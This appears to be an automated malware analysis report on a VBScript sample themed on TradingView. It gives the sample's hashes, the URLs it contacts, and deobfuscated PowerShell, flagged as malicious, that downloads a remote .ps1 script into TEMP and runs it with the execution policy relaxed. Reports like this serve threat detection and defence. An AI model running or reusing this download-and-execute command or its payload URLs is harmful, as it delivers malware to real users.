| Hash | Hash Value |
|---|---|
| MD5 | e7fc1f913b8f9ca6c1ec09a8b09f5317 |
| Sha1 | cd1be7c6d1b90ac9dd65d68c74848c196e153db9 |
| Sha256 | 52c8dbdbb49a1df98c8b79b8e268e8e7c8c9c05aee6bf3fc5aecc0093e8627b0 |
| Sha384 | a07e6f0aae74983ed6fc4a55615b8a3db9bff45c90a2ec680e2937fdf346d083381021019f1b13d25c4b9820daf737d6 |
| Sha512 | 7e1cdf2581d7c37dc0ea58c01d0d8d8165977368e0ed8190fc515942bd45759cfc8c490e57595cc6663f028ea33f6f42462a2ad3fc4fa5af947d814f59ffd666 |
| SSDeep | 12:SQvDzYHYNWQTuGHHppLsd8XIP4lFPbGVvGHDh8O8XIYAHpwo8b:SQA4buGHJB24lFTXHDCfJb |
| TLSH | 6AF02697C62DD1171797809C217514F8CD47E24DF0096825C590740F6C350F0EF80786 |

| Name | Value |
|---|---|
| URLs in VB Code - #1 | https://api.ipify.org |
| URLs in VB Code - #2 | https://dfgdfgeiurguer.live/lander/tradingview/counter.php?ip= |
| URLs in VB Code - #3 | https://captcha123.com/lander/tradingview/1.ps1 |
| Deobfuscated PowerShell | $url = "https://captcha123.com/lander/tradingview/1.ps1" $output = Join-Path $env:TEMP "script.ps1" Invoke-WebRequest -Uri $url -OutFile $output powershell -NoProfile -ExecutionPolicy "RemoteSigned" -File $output |
| Deobfuscated PowerShell | "" $url = "https://captcha123.com/lander/tradingview/1.ps1" $output = Join-Path $env:TEMP "script.ps1" Invoke-WebRequest -Uri $url -OutFile $output powershell -NoProfile -ExecutionPolicy "RemoteSigned" -File $output", 0, False |
| Deobfuscated PowerShell | [Unmanaged(ErrorExpressionAst)] "RemoteSigned" -File $output |
| Deobfuscated PowerShell | [Unmanaged(ErrorExpressionAst)] "RemoteSigned" -File $output ", 0, False" |
| Deobfuscated PowerShell | @(0, [Unmanaged(ErrorExpressionAst)] ,) false |

| Name | Value | Location |
|---|---|---|
| URLs in VB Code - #1 | https://api.ipify.org | e7fc1f913b8f9ca6c1ec09a8b09f5317 |
| URLs in VB Code - #2 | https://dfgdfgeiurguer.live/lander/tradingview/counter.php?ip= | e7fc1f913b8f9ca6c1ec09a8b09f5317 |
| URLs in VB Code - #3 | https://captcha123.com/lander/tradingview/1.ps1 | e7fc1f913b8f9ca6c1ec09a8b09f5317 |
| Deobfuscated PowerShell | $url = "https://captcha123.com/lander/tradingview/1.ps1" $output = Join-Path $env:TEMP "script.ps1" Invoke-WebRequest -Uri $url -OutFile $output powershell -NoProfile -ExecutionPolicy "RemoteSigned" -File $output Malicious | e7fc1f913b8f9ca6c1ec09a8b09f5317 > e7fc1f913b8f9ca6c1ec09a8b09f5317.deobfuscated.vbs > [Command #0] > [PowerShell Command] |
| Deobfuscated PowerShell | "" $url = "https://captcha123.com/lander/tradingview/1.ps1" $output = Join-Path $env:TEMP "script.ps1" Invoke-WebRequest -Uri $url -OutFile $output powershell -NoProfile -ExecutionPolicy "RemoteSigned" -File $output", 0, False Malicious | e7fc1f913b8f9ca6c1ec09a8b09f5317 > [PowerShell Command] |
| Deobfuscated PowerShell | [Unmanaged(ErrorExpressionAst)] "RemoteSigned" -File $output Malicious | e7fc1f913b8f9ca6c1ec09a8b09f5317 > e7fc1f913b8f9ca6c1ec09a8b09f5317.deobfuscated.vbs > [Command #0] > [PowerShell Command] > [Deobfuscated PS] > [PowerShell Command] |
| Deobfuscated PowerShell | [Unmanaged(ErrorExpressionAst)] "RemoteSigned" -File $output ", 0, False" Malicious | e7fc1f913b8f9ca6c1ec09a8b09f5317 > [PowerShell Command] > [Deobfuscated PS] > [PowerShell Command] |
| Deobfuscated PowerShell | @(0, [Unmanaged(ErrorExpressionAst)] ,) false Malicious | e7fc1f913b8f9ca6c1ec09a8b09f5317 > [PowerShell Command] > [PowerShell Command] |